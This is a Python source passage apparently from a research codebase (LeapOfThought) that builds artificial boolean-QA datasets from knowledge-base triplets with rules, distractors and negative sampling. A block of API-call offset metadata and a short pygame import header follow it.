#random.shuffle(test_inds)
#random.shuffle(dev_inds)
test_inds = test_inds[0: self._config['test_dev_size'][0]]
dev_inds = dev_inds[0:self._config['test_dev_size'][1]]
train_inds = train_inds[0:self._config['max_number_of_examples']]
else:
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
test_inds = inds[0:self._config['test_dev_size'][0]]
dev_inds = inds[self._config['test_dev_size'][0]:sum(self._config['test_dev_size'])]
train_inds = inds[sum(self._config['test_dev_size']):]
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
if self._save_sample:
if 'split' in self.examples_meta.columns:
logger.info(f"size of each split:\n{self.examples_meta['split'].value_counts()}")
random.seed(17)
if len(self.artiset_data) > 100:
self.artiset_data = random.sample(self.artiset_data,100)
save_func(self._output_file, self.artiset_data, sample_indent=self._save_sample)
else:
logger.info('uploading %d,%d,%d test,dev,train examples' % (len(test_inds),len(dev_inds),len(train_inds)))
save_func(self._output_file.replace('.jsonl', '_test.jsonl'), [self.artiset_data[i] for i in test_inds])
save_func(self._output_file.replace('.jsonl', '_dev.jsonl'), [self.artiset_data[i] for i in dev_inds])
save_func(self._output_file.replace('.jsonl', '_train.jsonl'), [self.artiset_data[i] for i in train_inds])
if len(self.examples_meta) > 0:
save_func(self._output_file.replace('.jsonl', '_meta.jsonl'), self.examples_meta.to_dict(orient='rows'))
return train_inds, dev_inds, test_inds
def save_single_split(self, split_data, split):
inds = [i for i in range(len(split_data))]
random.seed(17)
random.shuffle(inds)
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = self._output_file.find('_sample') > -1
save_func(self._output_file.replace('.jsonl', '_' + split + '.jsonl'), [split_data[i] for i in inds], sample_indent=si)
def save_aux_data(self, output_file, data):
if output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(output_file) and len(output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = output_file.find('_sample') > -1
save_func(output_file, data, sample_indent=si)
def build_artificial_dataset(self,args):
pass
def resplit(self, args):
logger.error('Not implemented for this artiset')
def build_statement_rule_property_examples(self, examples, split, statement_tag='statement', ablate_same_distractor_fields = 1.0,\
rule_tags=['implicit_rule','property'], distractor_tags = ['distractors'], ablation_list=[], use_shorthand=False, \
nlg_sampling=False, reverse_validity_frac=0):
# computing ID before ablations on the statement and rule tags:
for i, example in enumerate(examples):
m = hashlib.md5()
# note that the tags for ID creation are always the same!
for tag in [statement_tag] + rule_tags:
if tag in example:
if type(example[tag]) == list:
for e in example[tag]:
m.update(e['subject'].encode())
m.update(e['predicate'].encode())
m.update(e['object'].encode())
m.update(e['validity'].encode())
else:
m.update(example[tag]['subject'].encode())
m.update(example[tag]['predicate'].encode())
m.update(example[tag]['object'].encode())
m.update(example[tag]['validity'].encode())
example['id'] = m.hexdigest()
# Ablations
# now that all the examples are ready, we can ablate as needed:
random.seed(17)
for ablation in ablation_list:
if len(ablation) == 3:
fields, fraction, condition = ablation
examples_cands = [e for e in examples if e[condition[0]] in condition[1]]
else:
fields, fraction = ablation
examples_cands = examples
example_to_ablate = random.sample(examples_cands, int(fraction * float(len(examples))))
for e in example_to_ablate:
for field in fields:
if field in e:
del e[field]
# for every field we ablate we must ablate the same field from distractors!
if random.random() < ablate_same_distractor_fields:
for distractor_tag in distractor_tags:
if distractor_tag in e:
if field in e[distractor_tag]:
del e[distractor_tag][field]
random.seed(17)
for i, example in enumerate(examples):
context_rules = []
# adding actual rules
for rule_tag in rule_tags:
if rule_tag in example:
rules = example[rule_tag]
if not type(rules) == list:
rules = [rules]
for rule in rules:
reverse_validity = not rule['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(rule,
is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand, nlg_sampling=nlg_sampling))
# adding distractors
for rule_tag in distractor_tags:
if rule_tag in example:
for field, tag_distractors in example[rule_tag].items():
for rule in tag_distractors:
rule_list = rule
if not type(rule_list) == list:
rule_list = [rule_list]
for r in rule_list:
reverse_validity = not r['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(r, is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand,
nlg_sampling=nlg_sampling))
use_hypothetical_statement = False
if 'is_hypothetical_statement' in example and example['is_hypothetical_statement']:
use_hypothetical_statement = True
answer = 1 if example[statement_tag]['validity'] == 'always true' else 0
if self.variant != 'statement_subject_lang_selectivity':
if random.random() < reverse_validity_frac:
answer = 1 - answer
reverse_validity = True
else:
reverse_validity = False
phrase = TeachAIKB().to_pseudo_language(example[statement_tag], is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling, reverse_validity=reverse_validity)
else:
statement_dict = deepcopy(example[statement_tag])
statement_dict['subject'] = random.sample(['foo','blah','ya','qux','aranglopa','foltopia','cakophon','baz','garply'], 1)[0]
phrase = TeachAIKB().to_pseudo_language(statement_dict, is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling)
# creating a unique set of rules that does not include the statement.
context_rules = list(set(context_rules))
# set order is random!! so we need to fix the order the get a replicable order.
context_rules = sorted(context_rules)
random.shuffle(context_rules)
example.update({'phrase': phrase, \
'answer': answer,
'context': ' '.join(context_rules),
'split': split,
'rules': context_rules})
# append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
# (that must contain a "phrase", "answer") and converts it to a BooleanQA format
self.append_teachyourai_format_example(example, do_print=False)
self.examples_meta.append(deepcopy(example))
    def print_examples(self, sample):
        """Pretty-print a random sample of generated examples to stdout.

        Highlights the statement's subject/predicate/object, hypernyms,
        negations and spelled-out counts inside the rendered
        question/answer/context text using the ``bc`` markers
        (presumably ANSI color codes -- ``bc`` is defined elsewhere).

        Args:
            sample: Number of examples to draw from ``self.artiset_data``.
        """
        # Fixed seed so repeated runs print the same sample.
        random.seed(7)
        example_inds = random.sample(range(len(self.artiset_data)), sample)
        ## Printing a sample!
        for ind in example_inds:
            example = self.artiset_data[ind]
            if 'statement' in example:
                statement = example['statement']
                rules = '\n'.join(example['rules'])
                # Render "id(split): Q:... A:... C:..." with bold markers.
                e = f"{example['id']}({example['split']}):\n{bc.BOLD}Q:{bc.ENDC}{example['phrase']} {bc.BOLD}A:{bc.ENDC}{example['answer']}\n{bc.BOLD}C:{bc.ENDC}{rules} "
                # Colorize each statement component wherever it occurs in the text.
                e = e.replace(statement['object'], f"{bc.Blue}{statement['object']}{bc.ENDC}")
                e = e.replace(statement['predicate'], f"{bc.Green}{statement['predicate']}{bc.ENDC}")
                e = e.replace(str(statement['subject']), f"{bc.Magenta}{statement['subject']}{bc.ENDC}")
                if 'hypernym' in example:
                    hypernym = example['hypernym']['object']
                    e = e.replace(str(hypernym), f"{bc.Cyan}{hypernym}{bc.ENDC}")
                e = e.replace('not', f"{bc.Red}not{bc.ENDC}")
                e = e.replace('type', f"{bc.Yellow}type{bc.ENDC}")
                if 'num_of_instances' in example:
                    # Highlight the spelled-out instance count (e.g. " three ").
                    e = e.replace(' ' + num2words1[example['num_of_instances']].lower() + ' ' \
                                  , f"{bc.Red} {num2words1[example['num_of_instances']].lower()} {bc.ENDC}")
                for number in 'one', 'two', 'three', 'four', 'five':
                    e = e.replace(' ' + number + ' ', f"{bc.Cyan} {number} {bc.ENDC}")
            else:
                # No structured statement available; print the raw context string.
                e = f"{example['id']}({example['split']}):\n{bc.BOLD}Q:{bc.ENDC}{example['phrase']} {bc.BOLD}A:{bc.ENDC}{example['answer']}\n{bc.BOLD}C:{bc.ENDC}{example['context']} "
            print(e + '\n')
def create_subject_filter_lookup(self, examples, sample_on=None, avoid_mixing=None):
if sample_on is not None:
triplets_to_sample_on = [e[sample_on] for e in examples]
else:
triplets_to_sample_on = examples
# building subject filter lookup:
subject_filter_lookup = {}
rules_to_sample_df = pd.DataFrame(triplets_to_sample_on)
for curr_subject, matching_records in tqdm(rules_to_sample_df.groupby('subject')):
subject_to_filter = {curr_subject}
if avoid_mixing is not None and 'predicates' in avoid_mixing:
subject_to_filter |= set(
rules_to_sample_df[~rules_to_sample_df['predicate'].isin(set(matching_records['predicate']))]['subject'])
if avoid_mixing is not None and 'hyponyms' in avoid_mixing:
subject_to_filter |= {e['subject'] for e in TeachAIKB().sample({'predicate': 'hypernym', 'object': curr_subject})}
if avoid_mixing is not None and 'co-hyponyms' in avoid_mixing:
subject_is_hyponym_of = {e['object'] for e in TeachAIKB().sample({'subject': curr_subject, 'predicate': 'hypernym'})}
subject_to_filter |= {e['subject'] for e in
TeachAIKB().sample({'predicate': 'hypernym', 'object': list(subject_is_hyponym_of)})}
if avoid_mixing is not None and 'co-meronyms' in avoid_mixing:
subject_is_meronym_of = {e['subject'] for e in TeachAIKB().sample({'predicate': 'meronym', 'object': curr_subject})}
subject_to_filter |= {e['object'] for e in
TeachAIKB().sample({'predicate': 'meronym', 'subject': list(subject_is_meronym_of)})}
subject_filter_lookup[curr_subject] = subject_to_filter
return subject_filter_lookup
#@profile
def self_negative_subject_sample(self, examples, sample_on = None, avoid_mixing=None, over_sample = 1.0):
examples = deepcopy(examples)
if sample_on is not None:
triplets_to_sample_on = [e[sample_on] for e in examples]
else:
triplets_to_sample_on = examples
subject_filter_lookup = self.create_subject_filter_lookup(examples, sample_on, avoid_mixing)
output = []
examples_to_gen_from = deepcopy(examples) + random.sample(deepcopy(examples),int((over_sample - 1) * len(examples)))
for i,example in tqdm(enumerate(examples_to_gen_from)):
# sometimes we just want a list of triplets, with no specific dictionary field called "sample_on" ...
if sample_on is not None:
curr_triplet = example[sample_on]
else:
curr_triplet = example
curr_subject = curr_triplet['subject']
if sample_on is not None:
new_edge = deepcopy(
random.sample([e for e in examples if e[sample_on]['subject'] not in subject_filter_lookup[curr_subject]], 1)[0])
new_edge[sample_on]['predicate'] = deepcopy(curr_triplet['predicate'])
new_edge[sample_on]['object'] = deepcopy(curr_triplet['object'])
new_edge[sample_on]['validity'] = 'never true'
else:
new_edge = deepcopy(
random.sample([e for e in triplets_to_sample_on if e['subject'] not in subject_filter_lookup[curr_subject]], 1)[0])
new_edge['predicate'] = deepcopy(curr_triplet['predicate'])
new_edge['object'] = deepcopy(curr_triplet['object'])
new_edge['validity'] = 'never true'
output.append(new_edge)
return output
def connect_negative_shuffle_subject(self, shuffle, shuffle_on, tar_tag, avoid_mixing=None):
logger.info(f'connect_negative_shuffle_subject {tar_tag}')
# We assume shuffle_on is only one field (usueally predicate or object)
# Finding "clusters" that may not be shuffled internally when producing negative examples
# (because the have downword monotone relations)
connect_to = deepcopy(shuffle)
triplets_to_shuffle_df = pd.DataFrame(([e[shuffle_on] for e in shuffle]))
field_to_shuffle_counts = triplets_to_shuffle_df['subject'].value_counts()
subjects_to_shuffle = set(triplets_to_shuffle_df['subject'])
remaining_inds_to_choose = set(triplets_to_shuffle_df.index)
for curr_subject, size in field_to_shuffle_counts.iteritems():
potential_target_inds = deepcopy(remaining_inds_to_choose)
tar_subjects = subjects_to_shuffle - {curr_subject}
tar_subjects -= {e['subject'] for e in TeachAIKB().sample({'predicate': 'hypernym', 'object': curr_subject})}
if avoid_mixing is not None and 'co-hyponyms' in avoid_mixing:
subject_is_hyponym_of = {e['object'] for e in TeachAIKB().sample({'subject': curr_subject, 'predicate': 'hypernym'})}
tar_subjects -= {e['subject'] for e in
TeachAIKB().sample({'predicate': 'hypernym', 'object': list(subject_is_hyponym_of)})}
if avoid_mixing is not None and 'co-meronyms' in avoid_mixing:
subject_is_meronym_of = {e['subject'] for e in self.sample({'predicate': 'meronym', 'object': curr_subject})}
tar_subjects -= {e['object'] for e in self.sample({'predicate': 'meronym', 'subject': list(subject_is_meronym_of)})}
potential_target_inds &= set(triplets_to_shuffle_df[triplets_to_shuffle_df['subject'].isin(tar_subjects)].index)
targets = [e for e in connect_to if e[shuffle_on]['subject'] == curr_subject]
selected_inds = []
for i in random.sample(potential_target_inds, len(potential_target_inds)):
new_edge = {'subject': curr_subject,
'predicate': triplets_to_shuffle_df.loc[i, 'predicate'],
'object': triplets_to_shuffle_df.loc[i, 'object']}
# checking if there is no triplet that is true with the same values:
matching_edges_in_kb = self.lookup(new_edge)
if len(matching_edges_in_kb) == 0:
targets[len(selected_inds)][tar_tag] = new_edge
targets[len(selected_inds)][tar_tag].update({'validity': 'never true'})
selected_inds.append(i)
if len(selected_inds) >= len(targets):
break
if len(selected_inds) < len(targets):
logger.debug(f'did not find enough for {curr_subject}: {len(selected_inds)} found, {len(targets)} required')
else:
logger.debug(f'{curr_subject}: {len(selected_inds)} found.')
remaining_inds_to_choose -= set(selected_inds)
return connect_to
def sample_distractors(self, examples, sample, tar_tag):
# building indexes:
for i, sample_props in enumerate(sample):
src_tag, src_fields, sample, exactly_sample_num, connect, balance_with_statement = sample_props
# creating general indexes
indexes = {}
for field in ['subject', 'predicate', 'object', 'validity']:
indexes[field] = {}
for i, r in enumerate(examples):
if r[src_tag][field] not in indexes[field]:
indexes[field][r[src_tag][field]] = {i}
else:
indexes[field][r[src_tag][field]] |= {i}
# Link the connection to existing tags.
for i, example in tqdm(enumerate(examples), desc=f'adding distractors for {sample_props}'):
cand_inds_signed = {}
# the index helps us get candidates fast from the df of candidate_edges
cand_inds = set(range(len(examples)))
for field in src_fields:
cand_inds &= indexes[field][example[src_tag][field]]
# making sure cand edges do not contain a duplicate of the currect example
same_as_example_inds = indexes['subject'][example[src_tag]['subject']] & \
indexes['predicate'][example[src_tag]['predicate']] & \
indexes['object'][example[src_tag]['object']]
cand_inds -= same_as_example_inds
cand_inds_signed = {'always true':set(), 'never true': set()}
for validity in ['always true', 'never true']:
if validity in indexes['validity']:
cand_inds_signed[validity] |= cand_inds & indexes['validity'][validity]
if exactly_sample_num:
num_to_sample = sample
else:
num_to_sample = random.sample(range(min(len(cand_inds_signed['always true']) + \
len(cand_inds_signed['never true']), sample) + 1), 1)[0]
# Here we choose what is the validity value of the distractor we want to sample
if balance_with_statement is not None:
# balance_with_statement is not None, that means we care about the validity value balancing.
validities_to_sample = {'always true': math.ceil(num_to_sample / 2), 'never true': math.ceil(num_to_sample / 2)}
if balance_with_statement and validities_to_sample[example[src_tag]['validity']] > 0:
validities_to_sample[example[src_tag]['validity']] -= 1
else:
# Here we just randomly sample from a certain validity value (balance_with_statement is None, so it doesn't matter to us)
validities_to_sample = {'always true': 0, 'never true': 0}
validity_value_to_sample = random.sample(['always true', 'never true'],1)[0]
validities_to_sample[validity_value_to_sample] = num_to_sample
balanced_cand_inds = []
for validity, num_to_sample in validities_to_sample.items():
if len(cand_inds_signed[validity]) >= num_to_sample:
balanced_cand_inds += random.sample(cand_inds_signed[validity], num_to_sample)
# now actually sampling the rule we want to add to distractors
if tar_tag not in example:
example[tar_tag] = {}
for ind in balanced_cand_inds:
for tag in connect:
if tag not in example[tar_tag]:
example[tar_tag][tag] = []
example[tar_tag][tag].append(examples[ind][tag])
return examples
def print_stats(self):
for part in ['statement', 'implicit_rule', 'property']:
entities = {'dev': [], 'train': []}
for e in self.examples_meta:
if part in e:
if e['split'] == 'dev':
entities['dev'] += [e[part]['subject'], e[part]['object']]
elif e['split'] == 'train':
entities['train'] += [e[part]['subject'], e[part]['object']]
if len(entities['dev']) == 0 | len(entities['train']) == 0:
logger.info(f" {part} was not found or ablated.")
continue
entities_intersection_ratio = len(set(entities['dev']) & set(entities['train'])) / \
len(set(entities['dev']) | set(entities['train']))
logger.info(f"Dev/Train entity intersection in {part} :\n{entities_intersection_ratio}\n")
if entities_intersection_ratio > 0.01:
entity_stats = pd.DataFrame(
{'dev': pd.Series(entities['dev']).value_counts(), 'train': pd.Series(entities['train']).value_counts()}).dropna()
entity_stats['min'] = entity_stats[['dev', 'train']].min(axis=1)
logger.info(f"mutual entities stats:\n{entity_stats.sort_values(by='min')}")
if 'statement' in self.examples_meta[0]:
agg = pandas_multi_column_agg(pd.DataFrame([{'predicate': e['statement']['predicate'],'split':e['split'], 'z': 1} \
for e in self.examples_meta]), ['split', 'predicate'])
logger.info(f"Predicate count per split:\n{agg}\n")
examples_meta_df = pd.DataFrame(self.examples_meta)
logger.info(f"Positive vs Negative:\n{pandas_multi_column_agg(examples_meta_df, ['split', 'answer'])}\n")
| [
"logging.getLogger",
"copy.deepcopy",
"numpy.random.RandomState",
"pandas.set_option",
"numpy.random.seed",
"pandas.DataFrame",
"random.sample",
"hashlib.md5",
"random.shuffle",
"LeapOfThought.common.data_utils.pandas_multi_column_agg",
"os.path.abspath",
"logging.basicConfig",
"pandas.Serie... | [((413, 451), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(500)'], {}), "('display.max_rows', 500)\n", (426, 451), True, 'import pandas as pd\n'), ((452, 493), 'pandas.set_option', 'pd.set_option', (['"""display.max_columns"""', '(500)'], {}), "('display.max_columns', 500)\n", (465, 493), True, 'import pandas as pd\n'), ((494, 530), 'pandas.set_option', 'pd.set_option', (['"""display.width"""', '(2000)'], {}), "('display.width', 2000)\n", (507, 530), True, 'import pandas as pd\n'), ((531, 573), 'pandas.set_option', 'pd.set_option', (['"""display.max_colwidth"""', '(200)'], {}), "('display.max_colwidth', 200)\n", (544, 573), True, 'import pandas as pd\n'), ((574, 624), 'pandas.set_option', 'pd.set_option', (['"""display.colheader_justify"""', '"""left"""'], {}), "('display.colheader_justify', 'left')\n", (587, 624), True, 'import pandas as pd\n'), ((747, 854), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s - %(levelname)s - %(name)s - %(message)s"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)s - %(levelname)s - %(name)s - %(message)s', level=logging.INFO)\n", (766, 854), False, 'import logging\n'), ((879, 906), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (896, 906), False, 'import logging\n'), ((997, 1012), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (1008, 1012), False, 'import random\n'), ((1021, 1041), 'numpy.random.seed', 'np.random.seed', (['(1234)'], {}), '(1234)\n', (1035, 1041), True, 'import numpy as np\n'), ((1066, 1091), 'numpy.random.RandomState', 'np.random.RandomState', (['(17)'], {}), '(17)\n', (1087, 1091), True, 'import numpy as np\n'), ((3095, 3108), 'hashlib.md5', 'hashlib.md5', ([], {}), '()\n', (3106, 3108), False, 'import hashlib\n'), ((3965, 3980), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (3976, 3980), False, 'import random\n'), ((3989, 4009), 'random.shuffle', 'random.shuffle', (['inds'], {}), 
'(inds)\n', (4003, 4009), False, 'import random\n'), ((6299, 6325), 'random.shuffle', 'random.shuffle', (['train_inds'], {}), '(train_inds)\n', (6313, 6325), False, 'import random\n'), ((10455, 10470), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (10466, 10470), False, 'import random\n'), ((10479, 10499), 'random.shuffle', 'random.shuffle', (['inds'], {}), '(inds)\n', (10493, 10499), False, 'import random\n'), ((12964, 12979), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (12975, 12979), False, 'import random\n'), ((13972, 13987), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (13983, 13987), False, 'import random\n'), ((18091, 18105), 'random.seed', 'random.seed', (['(7)'], {}), '(7)\n', (18102, 18105), False, 'import random\n'), ((20217, 20252), 'pandas.DataFrame', 'pd.DataFrame', (['triplets_to_sample_on'], {}), '(triplets_to_sample_on)\n', (20229, 20252), True, 'import pandas as pd\n'), ((21874, 21892), 'copy.deepcopy', 'deepcopy', (['examples'], {}), '(examples)\n', (21882, 21892), False, 'from copy import deepcopy\n'), ((23986, 24003), 'copy.deepcopy', 'deepcopy', (['shuffle'], {}), '(shuffle)\n', (23994, 24003), False, 'from copy import deepcopy\n'), ((24037, 24083), 'pandas.DataFrame', 'pd.DataFrame', (['[e[shuffle_on] for e in shuffle]'], {}), '([e[shuffle_on] for e in shuffle])\n', (24049, 24083), True, 'import pandas as pd\n'), ((32403, 32435), 'pandas.DataFrame', 'pd.DataFrame', (['self.examples_meta'], {}), '(self.examples_meta)\n', (32415, 32435), True, 'import pandas as pd\n'), ((4070, 4123), 'random.sample', 'random.sample', (['inds', "self._config['test_dev_size'][0]"], {}), "(inds, self._config['test_dev_size'][0])\n", (4083, 4123), False, 'import random\n'), ((4199, 4252), 'random.sample', 'random.sample', (['inds', "self._config['test_dev_size'][1]"], {}), "(inds, self._config['test_dev_size'][1])\n", (4212, 4252), False, 'import random\n'), ((5367, 5420), 'random.sample', 'random.sample', (['inds', 
"self._config['test_dev_size'][0]"], {}), "(inds, self._config['test_dev_size'][0])\n", (5380, 5420), False, 'import random\n'), ((5496, 5549), 'random.sample', 'random.sample', (['inds', "self._config['test_dev_size'][1]"], {}), "(inds, self._config['test_dev_size'][1])\n", (5509, 5549), False, 'import random\n'), ((9419, 9434), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (9430, 9434), False, 'import random\n'), ((12013, 12026), 'hashlib.md5', 'hashlib.md5', ([], {}), '()\n', (12024, 12026), False, 'import hashlib\n'), ((17416, 17445), 'random.shuffle', 'random.shuffle', (['context_rules'], {}), '(context_rules)\n', (17430, 17445), False, 'import random\n'), ((22208, 22226), 'copy.deepcopy', 'deepcopy', (['examples'], {}), '(examples)\n', (22216, 22226), False, 'from copy import deepcopy\n'), ((24415, 24449), 'copy.deepcopy', 'deepcopy', (['remaining_inds_to_choose'], {}), '(remaining_inds_to_choose)\n', (24423, 24449), False, 'from copy import deepcopy\n'), ((1225, 1237), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1234, 1237), False, 'import _jsonnet, json\n'), ((8230, 8245), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (8241, 8245), False, 'import random\n'), ((8258, 8284), 'random.shuffle', 'random.shuffle', (['train_inds'], {}), '(train_inds)\n', (8272, 8284), False, 'import random\n'), ((8667, 8682), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (8678, 8682), False, 'import random\n'), ((8695, 8715), 'random.shuffle', 'random.shuffle', (['inds'], {}), '(inds)\n', (8709, 8715), False, 'import random\n'), ((9053, 9089), 'LeapOfThought.common.file_utils.is_path_creatable', 'is_path_creatable', (['self._output_file'], {}), '(self._output_file)\n', (9070, 9089), False, 'from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable\n'), ((9516, 9553), 'random.sample', 'random.sample', (['self.artiset_data', '(100)'], {}), '(self.artiset_data, 100)\n', (9529, 9553), False, 'import 
random\n'), ((10607, 10643), 'LeapOfThought.common.file_utils.is_path_creatable', 'is_path_creatable', (['self._output_file'], {}), '(self._output_file)\n', (10624, 10643), False, 'from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable\n'), ((11108, 11138), 'LeapOfThought.common.file_utils.is_path_creatable', 'is_path_creatable', (['output_file'], {}), '(output_file)\n', (11125, 11138), False, 'from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable\n'), ((16643, 16675), 'copy.deepcopy', 'deepcopy', (['example[statement_tag]'], {}), '(example[statement_tag])\n', (16651, 16675), False, 'from copy import deepcopy\n'), ((18025, 18042), 'copy.deepcopy', 'deepcopy', (['example'], {}), '(example)\n', (18033, 18042), False, 'from copy import deepcopy\n'), ((22243, 22261), 'copy.deepcopy', 'deepcopy', (['examples'], {}), '(examples)\n', (22251, 22261), False, 'from copy import deepcopy\n'), ((22937, 22972), 'copy.deepcopy', 'deepcopy', (["curr_triplet['predicate']"], {}), "(curr_triplet['predicate'])\n", (22945, 22972), False, 'from copy import deepcopy\n'), ((23021, 23053), 'copy.deepcopy', 'deepcopy', (["curr_triplet['object']"], {}), "(curr_triplet['object'])\n", (23029, 23053), False, 'from copy import deepcopy\n'), ((23348, 23383), 'copy.deepcopy', 'deepcopy', (["curr_triplet['predicate']"], {}), "(curr_triplet['predicate'])\n", (23356, 23383), False, 'from copy import deepcopy\n'), ((23421, 23453), 'copy.deepcopy', 'deepcopy', (["curr_triplet['object']"], {}), "(curr_triplet['object'])\n", (23429, 23453), False, 'from copy import deepcopy\n'), ((32118, 32238), 'pandas.DataFrame', 'pd.DataFrame', (["[{'predicate': e['statement']['predicate'], 'split': e['split'], 'z': 1} for\n e in self.examples_meta]"], {}), "([{'predicate': e['statement']['predicate'], 'split': e['split'\n ], 'z': 1} for e in self.examples_meta])\n", (32130, 32238), True, 'import pandas as pd\n'), ((16047, 
16062), 'random.random', 'random.random', ([], {}), '()\n', (16060, 16062), False, 'import random\n'), ((16720, 16824), 'random.sample', 'random.sample', (["['foo', 'blah', 'ya', 'qux', 'aranglopa', 'foltopia', 'cakophon', 'baz',\n 'garply']", '(1)'], {}), "(['foo', 'blah', 'ya', 'qux', 'aranglopa', 'foltopia',\n 'cakophon', 'baz', 'garply'], 1)\n", (16733, 16824), False, 'import random\n'), ((32482, 32544), 'LeapOfThought.common.data_utils.pandas_multi_column_agg', 'pandas_multi_column_agg', (['examples_meta_df', "['split', 'answer']"], {}), "(examples_meta_df, ['split', 'answer'])\n", (32505, 32544), False, 'from LeapOfThought.common.data_utils import uniform_sample_by_column, pandas_multi_column_agg\n'), ((1140, 1165), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1155, 1165), False, 'import os\n'), ((13671, 13686), 'random.random', 'random.random', ([], {}), '()\n', (13684, 13686), False, 'import random\n'), ((16264, 16275), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (16273, 16275), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((16841, 16852), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (16850, 16852), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((22772, 22885), 'random.sample', 'random.sample', (["[e for e in examples if e[sample_on]['subject'] not in\n subject_filter_lookup[curr_subject]]", '(1)'], {}), "([e for e in examples if e[sample_on]['subject'] not in\n subject_filter_lookup[curr_subject]], 1)\n", (22785, 22885), False, 'import random\n'), ((23192, 23307), 'random.sample', 'random.sample', (["[e for e in triplets_to_sample_on if e['subject'] not in\n subject_filter_lookup[curr_subject]]", '(1)'], {}), "([e for e in triplets_to_sample_on if e['subject'] not in\n subject_filter_lookup[curr_subject]], 1)\n", (23205, 23307), False, 'import random\n'), ((29254, 29282), 'math.ceil', 'math.ceil', 
(['(num_to_sample / 2)'], {}), '(num_to_sample / 2)\n', (29263, 29282), False, 'import math\n'), ((29298, 29326), 'math.ceil', 'math.ceil', (['(num_to_sample / 2)'], {}), '(num_to_sample / 2)\n', (29307, 29326), False, 'import math\n'), ((29804, 29851), 'random.sample', 'random.sample', (["['always true', 'never true']", '(1)'], {}), "(['always true', 'never true'], 1)\n", (29817, 29851), False, 'import random\n'), ((30175, 30231), 'random.sample', 'random.sample', (['cand_inds_signed[validity]', 'num_to_sample'], {}), '(cand_inds_signed[validity], num_to_sample)\n', (30188, 30231), False, 'import random\n'), ((24565, 24576), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (24574, 24576), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((20767, 20778), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (20776, 20778), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((20976, 20987), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (20985, 20987), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((21146, 21157), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (21155, 21157), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((21371, 21382), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (21380, 21382), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((21538, 21549), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (21547, 21549), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((24774, 24785), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (24783, 24785), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((24939, 24950), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (24948, 
24950), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((14478, 14489), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (14487, 14489), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((31745, 31771), 'pandas.Series', 'pd.Series', (["entities['dev']"], {}), "(entities['dev'])\n", (31754, 31771), True, 'import pandas as pd\n'), ((31797, 31825), 'pandas.Series', 'pd.Series', (["entities['train']"], {}), "(entities['train'])\n", (31806, 31825), True, 'import pandas as pd\n'), ((15369, 15380), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (15378, 15380), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n')] |
import os
import pygame
from pygame.locals import *
from pygame.compat import geterror
from globals import DELTAX, DELTAY
# Absolute directory containing this module, and its bundled asset folder.
